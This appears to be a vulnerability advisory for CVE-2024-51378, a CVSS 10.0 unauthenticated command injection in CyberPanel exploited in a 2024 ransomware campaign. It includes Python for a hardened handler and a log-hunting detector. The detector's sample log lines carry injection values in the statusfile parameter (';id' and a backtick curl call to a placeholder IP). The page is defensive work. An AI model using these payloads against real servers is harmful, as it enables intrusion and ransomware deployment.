
CVE-2024-51378

Tags: Critical · CISA KEV · Active Exploitation · EUVD Exploited · Public PoC · Ransomware-linked · RCE

Published: 29 October 2024
Modified: 07 November 2025
KEV Added: 04 December 2024
Patch: available (see the commit reference under "Deeper analysis")
CVSS Score v3.1: 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
EPSS Score: 0.9385 (99.9th percentile)
Risk Priority: 96 (weighting: 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2024-51378 is a critical-severity OS Command Injection (CWE-78) vulnerability in CyberPanel. Its CVSS v3.1 base score is 10.0 (Critical).

Operationally, it ranks in the top 0.1% of CVEs by exploit likelihood (EPSS 0.9385); CISA has added it to the Known Exploited Vulnerabilities catalog; and a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).

Deeper analysis

CyberPanel versions through 2.3.6 and unpatched 2.3.7 contain an OS command injection vulnerability in the getresetstatus functions of dns/views.py and ftp/views.py. secMiddleware, the layer intended to screen request input, is applied only to POST requests, so a remote attacker who sends the request with any other HTTP method reaches the view unauthenticated and uninspected. Shell metacharacters supplied in the statusfile parameter of /dns/getresetstatus or /ftp/getresetstatus are then passed into an OS command and executed.
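The two conditions the advisory names, a middleware that inspects only POST and a view that concatenates statusfile into a shell command, can be modelled side by side with a hardened version. The following Python is an added example written for this page, not CyberPanel's code: the handler names, the inspected-method rule, the `cat` command and the /home/cyberpanel directory are assumptions chosen to illustrate the pattern and the fix.

```python
import re
from pathlib import PurePosixPath

# Characters that let a shell split or chain commands; used by both the
# simulated middleware filter and the hardened validator.
SHELL_METACHARS = re.compile(r"[;&|`$()<>\n\r]")

# Assumed location of the status files the view is supposed to read.
ALLOWED_DIR = PurePosixPath("/home/cyberpanel")
# Allow-list for the file name itself: no slashes, no spaces, no metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]+$")


def middleware_inspects(method: str) -> bool:
    """Model of a filter that looks at POST requests only (the bypass condition).
    Requests sent with any other method pass through uninspected."""
    return method.upper() == "POST"


def vulnerable_handler(method: str, statusfile: str):
    """Hypothetical pre-patch flow. The middleware blocks metacharacters, but
    only for POST; for other methods the raw parameter is concatenated into a
    command string that would be handed to a shell (shell=True style).
    Returns the command string, or None when the middleware blocked it."""
    if middleware_inspects(method) and SHELL_METACHARS.search(statusfile):
        return None
    return "cat " + statusfile  # ';id' appended by the client becomes a second command


def validate_statusfile(statusfile: str) -> PurePosixPath:
    """Allow-list the file name and pin it under ALLOWED_DIR. Raises ValueError
    on anything a shell or the filesystem could interpret specially."""
    if statusfile in (".", "..") or not SAFE_NAME.fullmatch(statusfile):
        raise ValueError("statusfile must be a plain file name: %r" % statusfile)
    return ALLOWED_DIR / statusfile


def hardened_handler(method: str, statusfile: str):
    """Post-fix flow: validate regardless of method (method is kept only for
    signature symmetry), and build an argv list so the file name is never
    interpreted by a shell. Returns the argv list for subprocess.run(argv),
    or None when the input is rejected."""
    try:
        path = validate_statusfile(statusfile)
    except ValueError:
        return None
    return ["cat", str(path)]


if __name__ == "__main__":
    for method in ("POST", "OPTIONS"):
        print(method, "vulnerable:", vulnerable_handler(method, "x;id"),
              "| hardened:", hardened_handler(method, "x;id"))
    print("hardened, valid name:", hardened_handler("GET", "reset.status"))
```

The point of the hardened version is that it does two independent things: it validates on every method rather than trusting a method-scoped middleware, and it removes the shell from the execution path, so even a validator bug cannot turn a file name into a command.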

The issue is exploitable by unauthenticated attackers over the network and yields full system compromise, with confidentiality, integrity and availability all at High impact (hence the CVSS score of 10.0). Exploitation in the wild was observed in October 2024.

The project advisory and changelog describe mitigation through application of the patch at commit 1c0c6cbcf71abe573da0b5fddfb9603e7477f683, which addresses the authentication bypass and command injection paths in the affected views. Because 2.3.7 builds exist both with and without this change, operators should confirm that a running install contains the commit rather than rely on the version string alone.

The current EPSS of 0.9385, with a peak of 0.9410, aligns with confirmed real-world exploitation activity against the product.


Vulnerability details

getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.

CWE(s): CWE-78 (OS Command Injection)
KEV Date Added: 04 December 2024

Related Threats

Threat-Actor Attribution (AI)

PSAUX
Exploited the CyberPanel zero-day in an October 2024 mass ransomware campaign, per BleepingComputer and the CISA KEV ransomware-use entry.
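A first triage step for anyone who ran an exposed CyberPanel during that campaign is to hunt web-server access logs for the two request properties the advisory describes: a request to either getresetstatus endpoint that is not a POST (the secMiddleware bypass), or one whose statusfile value carries shell metacharacters. The Python below is an added example for this page, not tooling from CyberPanel or from any of the cited reports; the log lines are constructed in combined-log format using documentation IP ranges, and the field layout is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote

TARGET_PATHS = {"/dns/getresetstatus", "/ftp/getresetstatus"}
SHELL_METACHARS = re.compile(r"[;&|`$()<>\n\r]")

# Combined log format (assumed): ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines; 203.0.113.0/24, 198.51.100.0/24 and 192.0.2.0/24
# are documentation ranges, not real attacker infrastructure.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Oct/2024:09:14:02 +0000] "OPTIONS /dns/getresetstatus?statusfile=/dev/null;id HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.3 - - [27/Oct/2024:09:15:10 +0000] "POST /dns/getresetstatus HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.0.2.44 - - [27/Oct/2024:09:16:31 +0000] "PUT /ftp/getresetstatus?statusfile=x%60curl%20203.0.113.7%60 HTTP/1.1" 200 90 "-" "curl/8.4.0"
192.0.2.10 - - [27/Oct/2024:09:17:00 +0000] "GET /login/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def query_params(query: str) -> dict:
    """Split a query string on '&' only (never on ';', which is itself a
    metacharacter we want to keep visible) and percent-decode the values."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def classify(line: str):
    """Return None for lines that do not touch a getresetstatus endpoint;
    otherwise a record with the reasons (if any) it looks like exploitation."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if parts.path not in TARGET_PATHS:
        return None
    reasons = []
    if m["method"] != "POST":
        reasons.append("non-POST method %s skips secMiddleware" % m["method"])
    statusfile = query_params(parts.query).get("statusfile")
    if statusfile is not None and SHELL_METACHARS.search(statusfile):
        reasons.append("shell metacharacters in statusfile")
    return {
        "ip": m["ip"], "ts": m["ts"], "method": m["method"],
        "path": parts.path, "status": int(m["status"]),
        "statusfile": statusfile, "suspicious": bool(reasons), "reasons": reasons,
    }


def hunt(lines):
    """Return only the suspicious records. A plain POST to the endpoint is not
    flagged: its statusfile travels in the body, which access logs do not
    record, so body-level inspection needs a WAF or application log instead."""
    hits = []
    for line in lines:
        rec = classify(line)
        if rec and rec["suspicious"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG.splitlines()):
        print(hit["ip"], hit["method"], hit["path"], "->", "; ".join(hit["reasons"]))
```

On the constructed sample the OPTIONS and PUT requests are flagged on both counts, the POST is recorded but not flagged, and the unrelated GET is ignored. A 200 status on a flagged line is worth escalating, since the vulnerable endpoint returns normally after executing the injected command.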

Affected Assets

Vendor: cyberpanel
Product: cyberpanel
Versions: ≤ 2.3.8

The advisory text itself names versions through 2.3.6 and unpatched 2.3.7, so the version range above is broader than the advisory; presence of the fixing commit, not the version string, is the reliable indicator of a patched install.

Mitigating Controls

NIST 800-53 r5 mapping (AI)

AC-3 Access Enforcement (prevent)

Directly blocks the unauthenticated access to /dns/getresetstatus and /ftp/getresetstatus that bypasses secMiddleware; enforcement must apply to every HTTP method, not only POST.

SI-10 Information Input Validation (prevent)

Requires validation and sanitization of the statusfile parameter to reject shell metacharacters that enable command injection; invoking the underlying command without a shell removes the injection sink entirely.

respond

Mandates prompt application of the patch in commit 1c0c6cb to eliminate the authentication-bypass and command-execution paths.
